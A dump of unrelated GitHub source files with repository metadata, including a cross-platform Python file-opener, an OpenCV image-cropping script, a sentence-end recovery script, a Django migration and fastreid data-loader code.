] | permissive | meniossin/src | 42a95cc6c4a9c71d43d62bc4311224ca1fd61e03 | 44f73f7e76119e5ab415d4593ac66485e65d700a | refs/heads/master | 2022-12-16T20:17:03.747113 | 2020-09-03T10:43:12 | 2020-09-03T10:43:12 | 263,710,168 | 1 | 0 | BSD-3-Clause | 2020-05-13T18:20:09 | 2020-05-13T18:20:08 | null | UTF-8 | Python | false | false | 6,038 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Utility for opening a file using the default application in a cross-platform
manner. Modified from http://code.activestate.com/recipes/511443/.
"""
__version__ = '1.1x'
__all__ = ['open']
import os
import sys
import webbrowser
import subprocess
# Registry of available launcher controllers, keyed by program name, and
# the opener callable selected for this platform (both bound by the
# platform-dispatch block below at import time).
_controllers = {}
_open = None
class BaseController(object):
    '''Base class for open program controllers.'''
    def __init__(self, name):
        # Human-readable identifier of the underlying launcher program.
        self.name = name
    def open(self, filename):
        # Subclasses must implement the actual launch and return a bool.
        raise NotImplementedError
class Controller(BaseController):
    '''Controller for a generic open program.'''
    def __init__(self, *args):
        # args[0] is the launcher executable; any remaining args are fixed
        # arguments inserted before the target filename.
        super(Controller, self).__init__(os.path.basename(args[0]))
        self.args = list(args)
    def _invoke(self, cmdline):
        # Run *cmdline* and return True on a zero exit status.
        if sys.platform[:3] == 'win':
            closefds = False
            startupinfo = subprocess.STARTUPINFO()
            startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
        else:
            closefds = True
            startupinfo = None
        if (os.environ.get('DISPLAY') or sys.platform[:3] == 'win' or
            sys.platform == 'darwin'):
            # NOTE: file() is Python 2 only; this module predates Python 3.
            inout = file(os.devnull, 'r+')
        else:
            # for TTY programs, we need stdin/out
            inout = None
        # if possible, put the child precess in separate process group,
        # so keyboard interrupts don't affect child precess as well as
        # Python
        setsid = getattr(os, 'setsid', None)
        if not setsid:
            setsid = getattr(os, 'setpgrp', None)
        pipe = subprocess.Popen(cmdline, stdin=inout, stdout=inout,
                                stderr=inout, close_fds=closefds,
                                preexec_fn=setsid, startupinfo=startupinfo)
        # It is assumed that this kind of tools (gnome-open, kfmclient,
        # exo-open, xdg-open and open for OSX) immediately exit after lauching
        # the specific application
        returncode = pipe.wait()
        # Subclasses may define fixreturncode() to patch up launchers with
        # unreliable exit statuses (see KfmClient below).
        if hasattr(self, 'fixreturncode'):
            returncode = self.fixreturncode(returncode)
        # Shell convention: exit status 0 means success.
        return not returncode
    def open(self, filename):
        # basestring is Python 2 only (covers str and unicode).
        if isinstance(filename, basestring):
            cmdline = self.args + [filename]
        else:
            # assume it is a sequence
            cmdline = self.args + filename
        try:
            return self._invoke(cmdline)
        except OSError:
            # Launcher executable missing or not runnable.
            return False
# Platform support for Windows
if sys.platform[:3] == 'win':
    class Start(BaseController):
        '''Controller for the win32 start progam through os.startfile.'''
        def open(self, filename):
            try:
                os.startfile(filename)
            except WindowsError:
                # [Error 22] No application is associated with the specified
                # file for this operation: '<URL>'
                return False
            else:
                return True
    _controllers['windows-default'] = Start('start')
    _open = _controllers['windows-default'].open
# Platform support for MacOS
elif sys.platform == 'darwin':
    _controllers['open']= Controller('open')
    _open = _controllers['open'].open
# Platform support for Unix
else:
    # Python 2 only: the `commands` module was removed in Python 3.
    import commands
    # @WARNING: use the private API of the webbrowser module
    from webbrowser import _iscommand
    class KfmClient(Controller):
        '''Controller for the KDE kfmclient program.'''
        def __init__(self, kfmclient='kfmclient'):
            super(KfmClient, self).__init__(kfmclient, 'exec')
            self.kde_version = self.detect_kde_version()
        def detect_kde_version(self):
            # Parse the "KDE: x.y.z" line from `kde-config --version`;
            # returns None when the command is missing or yields no match.
            kde_version = None
            try:
                info = commands.getoutput('kde-config --version')
                for line in info.splitlines():
                    if line.startswith('KDE'):
                        kde_version = line.split(':')[-1].strip()
                        break
            except (OSError, RuntimeError):
                pass
            return kde_version
        def fixreturncode(self, returncode):
            # Trust kfmclient's exit status only on KDE newer than 3.5.4;
            # otherwise report success (EX_OK) unconditionally.
            if returncode is not None and self.kde_version > '3.5.4':
                return returncode
            else:
                return os.EX_OK
    def detect_desktop_environment():
        '''Checks for known desktop environments
        Return the desktop environments name, lowercase (kde, gnome, xfce)
        or "generic"
        '''
        desktop_environment = 'generic'
        if os.environ.get('KDE_FULL_SESSION') == 'true':
            desktop_environment = 'kde'
        elif os.environ.get('GNOME_DESKTOP_SESSION_ID'):
            desktop_environment = 'gnome'
        else:
            try:
                # Xfce marks the root window with _DT_SAVE_MODE = "xfce4".
                info = commands.getoutput('xprop -root _DT_SAVE_MODE')
                if ' = "xfce4"' in info:
                    desktop_environment = 'xfce'
            except (OSError, RuntimeError):
                pass
        return desktop_environment
    def register_X_controllers():
        # Register whichever desktop-specific openers exist on this system.
        if _iscommand('kfmclient'):
            _controllers['kde-open'] = KfmClient()
        for command in ('gnome-open', 'exo-open', 'xdg-open'):
            if _iscommand(command):
                _controllers[command] = Controller(command)
    def get():
        # Choose the opener matching the detected desktop, falling back to
        # xdg-open and finally to the webbrowser module.
        controllers_map = {
            'gnome': 'gnome-open',
            'kde': 'kde-open',
            'xfce': 'exo-open',
        }
        desktop_environment = detect_desktop_environment()
        try:
            controller_name = controllers_map[desktop_environment]
            return _controllers[controller_name].open
        except KeyError:
            # dict.has_key is Python 2 only.
            if _controllers.has_key('xdg-open'):
                return _controllers['xdg-open'].open
            else:
                return webbrowser.open
    # Desktop launchers need an X display to be useful.
    if os.environ.get("DISPLAY"):
        register_X_controllers()
    _open = get()
def open(filename):
    '''Open a file or an URL in the registered default application.'''
    # _open was bound at import time to the best launcher for this
    # platform; this wrapper intentionally shadows the builtin within the
    # module's public API (see __all__).
    return _open(filename)
| [
"arnaud@geometry.ee"
] | arnaud@geometry.ee |
916bdd6be2ab0c6f52deaa6390bed30b79c41458 | e2069d49028ca0e7640cb9bb65ae2ec93081790d | /classification_convert_crop.py | 27dba3be54b1844a07859604702244c381393b73 | [] | no_license | breadcrumbbuilds/classification-image-functions | 803879e331a4538ce4d3e3dc22045eb1b00b995a | 3a5c7082ca431c10a9ec636cca0e442680dc7a6d | refs/heads/master | 2020-07-07T03:17:55.613761 | 2019-08-28T18:27:25 | 2019-08-28T18:27:25 | 203,228,125 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,133 | py | """
Created on Fri Aug 16 09:47:57 2019
@author: brad.crump
Script converts and crops data, in future, add the option to not crop data.
Assumes that the input image contains "RGB" and "png".
Still from a naive approach, but has potential to be further generalized.
Use case:
If data has a substantial black background, this script can lessen the black
background. It also writes out a test and train map file for the images.
Folder structure:
present working directory
|_THIS_SCRIPT
|
|_class1
| |_FolderOfData1
| |_FolderOfData2
|_class2
| |_FolderOfData1
| |_FolderOfData2
|_class3
Will convert data out to classes1_classes2_..._classesN-DayAndTime
ie: PonderosaPine_SprucePine_2019-8-15-1356
"""
import os
import cv2
import time
import argparse
def ConvertAndCrop(cropMargin, testPercent):
    """
    Top-level driver: crop every class folder's RGB PNGs into a freshly
    created, date-stamped output folder and write the complete / train /
    validation map files.

    cropMargin  -- pixels of padding kept around the detected object crop
    testPercent -- approximate percentage of samples routed to the
                   validation map (every (100 // testPercent)-th line)
    """
    global CROP_MARGIN
    global TEST_SAMPLES
    CROP_MARGIN = cropMargin
    TEST_SAMPLES = testPercent
    ### Generate the new folders where we will write the cropped image data
    # get the path to the new folder for the data we will convert
    convertedDataFolder = makeDirectoryForConvertedData()
    print("Folder created: " + convertedDataFolder)
    completeMap = open(convertedDataFolder + "\\CompleteMap.RGB.txt", 'w')
    # create the subdirectories for each classes
    makeClassDirectories(convertedDataFolder)
    print("New Classes directories created")
    print("Converting Has Started...")
    convertData(getCurrentDirectory(), convertedDataFolder, completeMap)
    completeMap.close()
    # The (now closed) map file object is passed on; the split step
    # reopens it for reading via its .name attribute.
    splitTrainAndTestData(convertedDataFolder, completeMap)
    print("Done")
def getCurrentDirectory():
    """Return the absolute path of the directory containing this script."""
    script_path = os.path.realpath(__file__)
    return os.path.dirname(script_path)
def getPngs(directory):
    """
    Return the paths of all files under *directory* whose names contain
    both ".png" and "RGB". Paths are joined with a literal backslash,
    matching the Windows-style convention used throughout this script.
    """
    images = []
    for root, _dirs, filenames in os.walk(directory, topdown=False):
        images.extend(root + "\\" + filename
                      for filename in filenames
                      if ".png" in filename and "RGB" in filename)
    print("Images retrieved")
    return images
"""
Create a list of all the Classes in this conversion
"""
def getClassList():
    # Each immediate subdirectory of the script's own directory is one
    # class; returns the list of those subdirectory names.
    classes = []
    # walk the current directory
    for root, dirs, files in os.walk(getCurrentDirectory(), topdown=False):
        # Don't store the current directory, only the subdirectories
        # NOTE(review): `dirs` is a list, so comparing it against the
        # directory path string is always False; only the `dirs == []`
        # arm of this condition can ever fire.
        if dirs == getCurrentDirectory() or dirs == []:
            continue
        # store the directory
        classes.append(dirs)
    # Currently doing more work than needed:
    # os.walk inspects all the subdirectories as well, so we are just
    # returning the last index, which is the pwd children
    return classes[len(classes)-1]
"""
Creates a directory and returns the path
"""
def makeDirectoryForConvertedData():
    # Output folder name: "<class1>_<class2>_..._<Y-m-d-HMM>".
    # init empty folder name
    folderName = ""
    # get the Classes and append them to a string
    for aClass in getClassList():
        folderName = folderName + aClass + "_"
    # get the current date and time and append it to the string
    year, month, day, hour, minute = map(int, time.strftime("%Y %m %d %H %M").split())
    # Minutes are zero-padded; the hour is not (e.g. "2019-8-15-1356").
    now = str(year) + "-" + str(month) + "-" + str(day) + "-" + str(hour) + "" + '{:02d}'.format(minute)
    folderName = folderName + now
    # Hard code the location of the new folder in conversions
    # (Windows-only destination).
    path = "C:\\Conversions\\" + folderName
    # if the path doesn't exist, write it
    if not os.path.exists(path):
        os.makedirs(path)
    return path
"""
Create a directory for each class in this conversion
"""
def makeClassDirectories(folder):
    # One output subdirectory per class under *folder*.
    # loop through each class
    for aClass in getClassList():
        # create a new path for the class
        newDir = folder + "\\" + aClass
        # if the path doesn't exist, write it
        if not os.path.exists(newDir):
            os.makedirs(newDir)
"""
Converts data
"""
def convertData(currentDir, convertDir, mapFile):
    # Process each class folder; classMap is the running numeric label
    # written next to every image in the map file.
    classMap = 0
    # Loop through each folder
    for aClass in getClassList():
        # create the paths to be used
        currentPath = currentDir + "\\" + aClass
        convertPath = convertDir + "\\" + aClass
        # retrieve all the images to be converted
        oldImages = getPngs(currentPath)
        # crop and write the images
        cropWriteMapImages(oldImages, convertPath, aClass, mapFile, classMap)
        classMap = classMap + 1
"""
Crops and writes the image to the convertPath
"""
def cropWriteMapImages(oldImages, convertPath, aClass, mapFile, classMap):
    # Crop each source image and write it out under a sequential name,
    # appending one record per image to the complete map file.
    # for each old image
    print("Cropping and Writing " + aClass)
    print("This may take some time.")
    i = 0
    for image in oldImages:
        croppedImage = cropImage(image)
        # `i` becomes the sequential file-name suffix for this class.
        writeImageAndMap(croppedImage, convertPath, aClass, i, mapFile, classMap)
        i = i + 1
    print(aClass + " images have been written and cropped")
def cropImage(image):
    """
    Load the image file at path *image*, find its largest outer contour,
    and return the crop of that contour's bounding box expanded by
    CROP_MARGIN pixels (split evenly on each side).
    """
    image = cv2.imread(image)
    gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    # find the contours of the image (boundary)
    # cv2.findContours returns (image, contours, hierarchy) in OpenCV 3
    # but (contours, hierarchy) in OpenCV 4; [-2] is the contour list
    # under both APIs.
    contours = cv2.findContours(gray, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]
    if len(contours) == 0:
        # No foreground detected: return the image uncropped instead of
        # crashing (the original raised UnboundLocalError here because
        # largestCntIndex was never assigned).
        return image
    # The largest-area contour is taken to be the object's outer boundary.
    largestContour = max(contours, key=cv2.contourArea)
    # Bounding box for the largest contour
    x, y, w, h = cv2.boundingRect(largestContour)
    # add margin (and center); clamp the origin at zero so a box near the
    # image edge cannot produce negative indices (which would silently
    # wrap around and yield an empty or wrong crop).
    h = h + CROP_MARGIN
    w = w + CROP_MARGIN
    x = max(0, x - int(CROP_MARGIN / 2))
    y = max(0, y - int(CROP_MARGIN / 2))
    # create crop img using the bounding box
    return image[y:y+h, x:x+w]
"""
Writes a cropped image to the specified directory
"""
def writeImageAndMap(image, path, aClass, name, mapFile, classMap):
    # Write the cropped image as "<class>_<index>.RGB.png" and append a
    # matching record to the complete map file.
    # build the image name
    imageName = "\\" + aClass + "_" + str(name) + ".RGB.png"
    pathToImage = path + imageName
    cv2.imwrite(pathToImage, image)
    writeCompleteMap(mapFile, aClass, imageName, classMap)
def writeCompleteMap(file, aClass, imageName, classMap):
    # One record per image: "...\<class><imageName>\t<numeric label>\n".
    record = "...\\{0}{1}\t{2}\n".format(aClass, imageName, classMap)
    file.write(record)
def splitTrainAndTestData(folder, file):
    # Split the complete map into train/validation maps: every
    # (100 // TEST_SAMPLES)-th line goes to validation, the rest to train.
    print("Mapping Test and Train data")
    test = open(folder + "\\ValidationMap.RGB.txt", 'w')
    train = open(folder + "\\TrainMap.RGB.txt", 'w')
    testIndex = int(100/TEST_SAMPLES)
    i = 0
    # `file` was closed by the caller; reopen it by name for reading.
    with open(str(file.name), 'r') as f:
        for line in f:
            if i % testIndex == 0:
                test.write(line)
            else:
                train.write(line)
            i = i + 1
    print("Closing Files")
    # NOTE(review): the `with` block already closed f; this is redundant
    # but harmless.
    f.close()
    test.close()
train.close() | [
"bradrcrump@gmail.com"
] | bradrcrump@gmail.com |
f680454ba7b5af9fc6dc8c24ff0cd85b369acce2 | 55c87755a4d7664e8155ac30a4a2e713afae802d | /check_eos_bisent.py | ec3f638cee49d57e460f0d2be868b876cd2e414d | [] | no_license | seppilee/eval_grammar | c67edb5e1ee5f85689d87939299fed97c0c0d335 | d103a5e187308409f673d0d8deb4e92a9d103eef | refs/heads/master | 2020-03-14T16:51:36.277125 | 2019-05-19T14:34:04 | 2019-05-19T14:34:04 | 131,706,413 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,882 | py | #!/usr/bin/python
#-*- coding: UTF-8 -*-
import sys
import string
import re
reload(sys)
sys.setdefaultencoding("UTF-8")
def main(strRefFile):
hangul = re.compile('[^a-zA-Z0-9�꽦-�뀭媛�-�옡]+')
nLineNum = 0
lstRef = {}
# read reference file
fref = open(strRefFile, 'r')
while 1:
nLineNum = nLineNum + 1
strLine = fref.readline()
if not strLine:
break
strLine = strLine.strip('\r\n')
nTab = strLine.find('\t')
if nTab < 0:
continue
strSrc = strLine[0:nTab].strip()
strTgt = strLine[nTab+1:].strip()
strKey = hangul.sub('',strTgt) #?
if len(strSrc) <= 0 or len(strTgt) <= 0 or len(strKey) <= 0:
continue
print strKey
lstRef[strKey] = strTgt #?
# read working file for recovery of special character
nLineNum = 0
while 1:
try:
strLine = raw_input("")
except Exception:
break
if not strLine:
break
nLineNum = nLineNum + 1
if (nLineNum % 100) == 0:
sys.stderr.write("\r{0} lines progressed...".format(nLineNum))
line = strLine
nTab = line.find("\t")
if nTab < 0:
sys.stderr.write("{0} Line Error : [{1}]\n".format(nLineNum, line))
continue
strSrc2 = line[0:nTab].strip()
strTgt2 = line[nTab+1:].strip()
if len(strSrc2) <= 0 or len(strTgt2) <= 0:
sys.stderr.write("{0} Line Error : [{1}]\n".format(nLineNum, line))
#continue
strKey = hangul.sub('',strTgt2)
# starting recovery processing
strDiff="FALSE"
if len(strSrc2) <= 0:
strDiff="TRUE"
#print ">>",lstRef[strKey][-1],"<<"
if (strKey in lstRef) == True:
#not found end of sentence symbol and add EOS symbol
if strTgt2[-1] != lstRef[strKey][-1] and (lstRef[strKey][-1] == "." or lstRef[strKey][-1] == "?" or lstRef[strKey][-1] == "!"):
strTgt2 += lstRef[strKey][-1]
print ">>", strTgt2, "<<"
if strTgt2 != lstRef[strKey]:
strDiff="TRUE" # not same with original
strTgt2 = lstRef[strKey]
if len(strSrc2) > 0 and strSrc2[-1] != lstRef[strKey][-1] and strSrc2[-1] != "." and strSrc2[-1] != "?" and strSrc2[-1] != "!" and (lstRef[strKey][-1] == "." or lstRef[strKey][-1] == "?" or lstRef[strKey][-1] == "!"):
strSrc2 += lstRef[strKey][-1]
# print out the recovered file.
sys.stdout.write("{0}\t{1}\t{2}\n".format(strSrc2, strTgt2, strDiff))
sys.stderr.write("\n")
fref.close()
if __name__ == '__main__':
if len(sys.argv) < 2:
print "Example : python copy-period.py reference-file < input-file > output-file"
else:
main(sys.argv[1])
| [
"seppi.lee@hanmail.net"
] | seppi.lee@hanmail.net |
ce7933230d5bc50519059d8bf563e142cacd0f9d | 4f1218079f90a65befbf658679721886d71f4ee8 | /python/hackerrank/birthdaychocolate.py | ef225e1789e29cfa011f85c8ddf433ee3d17c0b9 | [] | no_license | Escaity/Library | 9f57767617422a7930caf48718d18f7ebef81547 | b34d8600e0a65845f1b3a16eb4b98fc7087a3160 | refs/heads/master | 2022-07-29T16:18:33.073738 | 2022-07-17T10:25:22 | 2022-07-17T10:25:22 | 238,588,249 | 0 | 0 | null | 2021-08-17T03:02:34 | 2020-02-06T02:04:08 | Python | UTF-8 | Python | false | false | 213 | py | def birthday(s, d, m):
n = len(s)
cnt = 0
for i in range(n - m + 1):
bar = 0
for j in range(i, i + m):
bar += s[j]
if bar == d:
cnt += 1
return cnt
| [
"esk2306@gmail.com"
] | esk2306@gmail.com |
a76f854b2570b8c9af51c1adba282901b8e156a8 | 71f6cc279029dde917e9d4e51abc8a30927eb520 | /rename_1d.py | 7bd596f84a1443eb11d8b957048e9e0b0a6a909a | [] | no_license | threeHardWorker/auto_tbdata | c2a03a4fb810c904c24c026b8730ea00ef07222e | b5371d7bca2ab80d8e340dce8bda3a07945af1f1 | refs/heads/master | 2020-03-18T17:29:42.143475 | 2018-05-27T09:27:56 | 2018-05-27T09:27:56 | 135,032,056 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 315 | py | import os
# Batch-rename exports: replace the marker '10秒' in every filename under
# c:\tmp\csv with a '10s_<start>_<end>' tag built from the two
# command-line date arguments.
import sys
if len(sys.argv) != 3:
    # NOTE(review): the usage string misspells the script name
    # ("reanme.py"), and exiting 0 on a usage error hides the failure
    # from calling scripts -- exit(1) would be conventional.
    print('Usage: reanme.py <start date> <end date>\n')
    exit(0)
path = 'c:\\tmp\\csv'
s = '10秒'
d = '10s_' + sys.argv[1] + '_' + sys.argv[2]
fs = os.listdir(path)
# Rename every entry in the (Windows) directory in place.
for f in fs:
    os.rename(path + '\\' + f,
path + '\\' + f.replace(s, d)) | [
"stoneguo@126.com"
] | stoneguo@126.com |
da05e53882fe0ea9e33aeee423de00ca20d345e3 | 11a68b37deda3060c76b190436b6e854264d37d6 | /agentredrabbit/agentredrabbit.py | c576fb932fa6820a776ceda46dd108119a9b0938 | [
"MIT"
] | permissive | publicbull/agentredrabbit | c97b98f2e95363da2e3176f5fdafcf35df55de9a | ef31c204904606bf5ef7c4060487a282e6d1d6e3 | refs/heads/master | 2021-01-18T16:19:11.763299 | 2013-09-02T12:53:51 | 2013-09-02T12:53:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,181 | py | """
The main method and signal handlers for agentredrabbit
"""
#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
import logging
import os
import pickle
import signal
import sys
import threading
from config import ReadConfig
from utils import log_format
from transport import Transporter
from transport import setFailsafeQueue, getFailsafeQueue
from optparse import OptionParser
except ImportError, err:
print "ImportError", err
import sys
sys.exit(1)
log = logging.getLogger(__name__)
# Worker threads and the shared shutdown Event; populated by main() and
# consumed by sighandler() during graceful shutdown.
threads = []
shutdown_event = None
def sighandler(signum, frame):
    """
    Signal handler method for agentredrabbit. Its purpose is to capture signals
    such as SIGTERM, SIGHUP, SIGQUIT, SIGINT and gracefully shutdown all the
    thread workers. signum and frame params are passed by `signal`
    """
    log.info("Starting graceful shutdown, caught signal #%s" % signum)
    global threads, shutdown_event
    # Ask every Transporter to stop, then wait for each one to finish.
    shutdown_event.set()
    for thread in threads:
        thread.join()
    # After join() each thread should report is_alive() == False.
    for thread in threads:
        log.info("%s running state = %s" % (thread, thread.is_alive()))
def main():
    """
    Main method for agentredrabbit. The workflow consists of parsing cmd arg,
    reading config file, have logger, signal handler setup, read from any
    previously dumped failsafe queue, configure thread event and lock objects,
    start threads and wait till a shutdown event is trigged upon which it dumps
    any leftover message from the in memory failsafe queue to a dump file.
    """
    log.setLevel(logging.INFO)
    parser = OptionParser(usage="%prog [-c config] [-v]",
                          version="%prog %s")
    parser.add_option("-c", "--config",
                      dest="config_file", default=None,
                      help="config file")
    parser.add_option("-v", "--verbose",
                      action="store_true", dest="verbose", default=False,
                      help="increase debug level from INFO to DEBUG")
    (options, args) = parser.parse_args()
    # Read config file
    cfg_path = "/etc/agentredrabbit.conf"
    if options.config_file is not None:
        cfg_path = options.config_file
    config = ReadConfig(cfg_path)
    # Setup logger
    log_level = logging.INFO
    if options.verbose:
        log_level = logging.DEBUG
    logging.basicConfig(filename=config["log_file"], filemode="a",
                        level=log_level, format=log_format)
    logging.getLogger("pika").setLevel(logging.INFO)
    # Setup signal handlers
    signal.signal(signal.SIGTERM, sighandler)
    signal.signal(signal.SIGINT, sighandler)
    signal.signal(signal.SIGQUIT, sighandler)
    signal.signal(signal.SIGHUP, sighandler)
    # Queue names are colon-separated in the config; drop empty entries.
    queues = filter(lambda x: x.strip() != "", config["queues"].split(":"))
    # Failsafe queue handling
    failsafeq = {}
    # Read from dump file if available
    dumpfilename = config["dump_file"]
    if os.path.exists(dumpfilename):
        with open(dumpfilename, "rb") as dumpfile:
            failsafeq = pickle.load(dumpfile)
            log.info("Loaded failsafeq: " + str(failsafeq))
    # Ensure every configured queue has an entry, even if the dump lacked it.
    for queue in queues:
        if queue not in failsafeq:
            failsafeq[queue] = []
    setFailsafeQueue(failsafeq)
    # Start threads: `workers` Transporter threads per queue.
    global threads, shutdown_event
    shutdown_event = threading.Event()
    qlock = threading.Lock()
    threadcount = int(config["workers"])
    log.info("[+] Starting workers for queues: " + ", ".join(queues))
    for idx, queue in enumerate(queues * threadcount):
        thread = Transporter(idx, qlock, config, queue, shutdown_event)
        thread.start()
        threads.append(thread)
    # Hang on till a shutdown event is triggered
    while not shutdown_event.is_set():
        signal.pause()
    # Dump in failsafeq to the dump file
    try:
        log.info("Dumping failsafe queue")
        dumpfile = open(dumpfilename, "wb")
        pickle.dump(getFailsafeQueue(), dumpfile)
        dumpfile.close()
    except IOError as err:
        # Fixed log-message typo from the original ("Dumpiing").
        log.error("Dumping failsafe queue failed: %s", err)
    log.info("We had a clean shutdown, Bye!")
    sys.exit(0)
# Script entry point.
if __name__ == "__main__":
    main()
| [
"rohit.yadav@wingify.com"
] | rohit.yadav@wingify.com |
24f6ce5d1d7d247f113554d063d6fe5404344652 | fb75a89ca9f9c322edccb28a0d8ca2983c183b5a | /ram/krish/migrations/0002_auto_20190909_1207.py | e8e876ba255083a632b6f15ca0bb5ade59a11717 | [] | no_license | Nagateja453/rkmission_django | af205d931dae3159f948a63e3e293aee1dc4a709 | a882248d6316535fa742248ad97af66d8cc82b6c | refs/heads/master | 2020-08-02T07:43:50.307469 | 2019-09-27T08:56:47 | 2019-09-27T08:56:47 | 211,277,398 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,232 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.24 on 2019-09-09 12:07
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import tinymce.models
class Migration(migrations.Migration):
    """Auto-generated Django migration (2019-09-09).

    Creates the ``AddPost`` model and removes the old ``director`` model
    (dropping its ``created_by`` FK first so the delete can succeed).
    Do not hand-edit generated migrations; create a new one instead.
    """
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('krish', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='AddPost',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('Date_of_Birth', models.CharField(max_length=255)),
                ('Place_Of_Birth', models.CharField(max_length=255)),
                ('Parents', models.CharField(max_length=255)),
                ('Wife', models.CharField(max_length=255)),
                ('Religious_Views', models.CharField(max_length=255)),
                ('Philosopy', models.CharField(max_length=255)),
                ('Memorial', models.CharField(max_length=255)),
                ('Place_Of_Death', models.CharField(max_length=255)),
                ('slug', models.SlugField(blank=True, max_length=900, null=True)),
                ('title', models.CharField(max_length=255)),
                ('excerpt', models.TextField(blank=True, null=True)),
                ('meta_description', models.TextField(blank=True, null=True)),
                ('keywords', models.TextField(blank=True, null=True)),
                ('modified_on', models.DateTimeField(auto_now=True)),
                ('created_on', models.DateTimeField(auto_now=True)),
                ('content', tinymce.models.HTMLField(blank=True, null=True, verbose_name='Content')),
                ('project_image1', models.FileField(blank=True, null=True, upload_to='project_logo')),
                ('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # Drop the FK before deleting the model it lives on.
        migrations.RemoveField(
            model_name='director',
            name='created_by',
        ),
        migrations.DeleteModel(
            name='director',
        ),
    ]
| [
"rahulkiranreddy13@gmail.com"
] | rahulkiranreddy13@gmail.com |
8fc33e667b9cd3bc3e640188e68f4aa66390f63a | 6bd4d4845ac3569fb22ce46e6bdd0a8e83dd38b7 | /fastreid/data/build.py | da5b4b0137cd82c4dc9cc869976c914e7c475f7a | [] | no_license | wodole/fast-reid | a227219acf2606124655d63fa88c0cf3e22f4099 | 9cf222e093b0d37c67d2d95829fdf74097b7fce1 | refs/heads/master | 2022-04-15T15:10:07.045423 | 2020-04-08T13:04:09 | 2020-04-08T13:04:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,159 | py | # encoding: utf-8
"""
@author: l1aoxingyu
@contact: sherlockliao01@gmail.com
"""
import logging
import torch
from torch._six import container_abcs, string_classes, int_classes
from torch.utils.data import DataLoader
from . import samplers
from .common import CommDataset, data_prefetcher
from .datasets import DATASET_REGISTRY
from .transforms import build_transforms
def build_reid_train_loader(cfg):
    """Build the training DataLoader (wrapped in a prefetcher) described by ``cfg``."""
    logger = logging.getLogger(__name__)

    # Collect the raw training samples from every configured dataset.
    items = []
    for name in cfg.DATASETS.NAMES:
        logger.info('prepare training set {}'.format(name))
        items.extend(DATASET_REGISTRY.get(name)().train)

    transforms = build_transforms(cfg, is_train=True)
    train_set = CommDataset(items, transforms, relabel=True)

    batch_size = cfg.SOLVER.IMS_PER_BATCH
    # PK sampling balances identities per batch; otherwise plain shuffling.
    if cfg.DATALOADER.PK_SAMPLER:
        sampler = samplers.RandomIdentitySampler(
            train_set.img_items, batch_size, cfg.DATALOADER.NUM_INSTANCE)
    else:
        sampler = samplers.TrainingSampler(len(train_set))
    batch_sampler = torch.utils.data.sampler.BatchSampler(sampler, batch_size, True)

    loader = torch.utils.data.DataLoader(
        train_set,
        num_workers=cfg.DATALOADER.NUM_WORKERS,
        batch_sampler=batch_sampler,
        collate_fn=fast_batch_collator,
    )
    return data_prefetcher(cfg, loader)
def build_reid_test_loader(cfg, dataset_name):
    """Build the inference DataLoader for ``dataset_name``.

    Returns a ``(prefetcher, num_query)`` pair; the first ``num_query``
    items of the loader are the query set, the rest the gallery.
    """
    logger = logging.getLogger(__name__)
    logger.info('prepare test set {}'.format(dataset_name))

    dataset = DATASET_REGISTRY.get(dataset_name)()
    # Query images come first, followed by the gallery; no relabeling at test time.
    test_set = CommDataset(dataset.query + dataset.gallery,
                           build_transforms(cfg, is_train=False),
                           relabel=False)

    batch_sampler = torch.utils.data.BatchSampler(
        samplers.InferenceSampler(len(test_set)), cfg.TEST.IMS_PER_BATCH, False)
    test_loader = DataLoader(test_set,
                             batch_sampler=batch_sampler,
                             num_workers=cfg.DATALOADER.NUM_WORKERS,
                             collate_fn=fast_batch_collator)
    return data_prefetcher(cfg, test_loader), len(dataset.query)
def trivial_batch_collator(batch):
    """Identity collator: hand the sampled batch back untouched."""
    return batch
def fast_batch_collator(batched_inputs):
    """
    Collate a list of samples into a batch, dispatching on the type of the
    first element (tensor / mapping / float / int / str). Other element
    types fall through and yield None, as before.
    """
    first = batched_inputs[0]
    if isinstance(first, torch.Tensor):
        # Pre-allocate the batch tensor, then copy each sample into its slot.
        batch = torch.zeros((len(batched_inputs), *first.size()), dtype=first.dtype)
        for idx, sample in enumerate(batched_inputs):
            batch[idx] += sample
        return batch
    if isinstance(first, container_abcs.Mapping):
        # Recurse per key so nested structures are collated too.
        return {k: fast_batch_collator([sample[k] for sample in batched_inputs])
                for k in first}
    if isinstance(first, float):
        return torch.tensor(batched_inputs, dtype=torch.float64)
    if isinstance(first, int_classes):
        return torch.tensor(batched_inputs)
    if isinstance(first, string_classes):
        return batched_inputs
| [
"sherlockliao01@gmail.com"
] | sherlockliao01@gmail.com |
d5676fa17de1d686869f532cf7410e0555426ced | a75e7f434271f1ce4bc9e89f6cc10126aa1947e7 | /test/__main__.py | b6661dcb01917492dc29fa3c377d63eb7fd7c385 | [] | no_license | smutel/pylib | 53f0918ef897d5df5e2ecb7a6b0179bdd3647843 | 463873a0f9ff2052f740be632dde746be6e3b19b | refs/heads/master | 2020-06-15T16:26:16.476496 | 2016-11-25T14:15:44 | 2016-11-25T14:15:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,637 | py | #!/usr/bin/env python
# vim:ts=4:sts=4:sw=4:et
#
# Author: Hari Sekhon
# Date: 2015-11-14 12:21:54 +0000 (Sat, 14 Nov 2015)
#
# https://github.com/harisekhon/pylib
#
# License: see accompanying Hari Sekhon LICENSE file
#
# If you're using my code you're welcome to connect with me on LinkedIn and optionally send me feedback to help improve or steer this or other code I publish
#
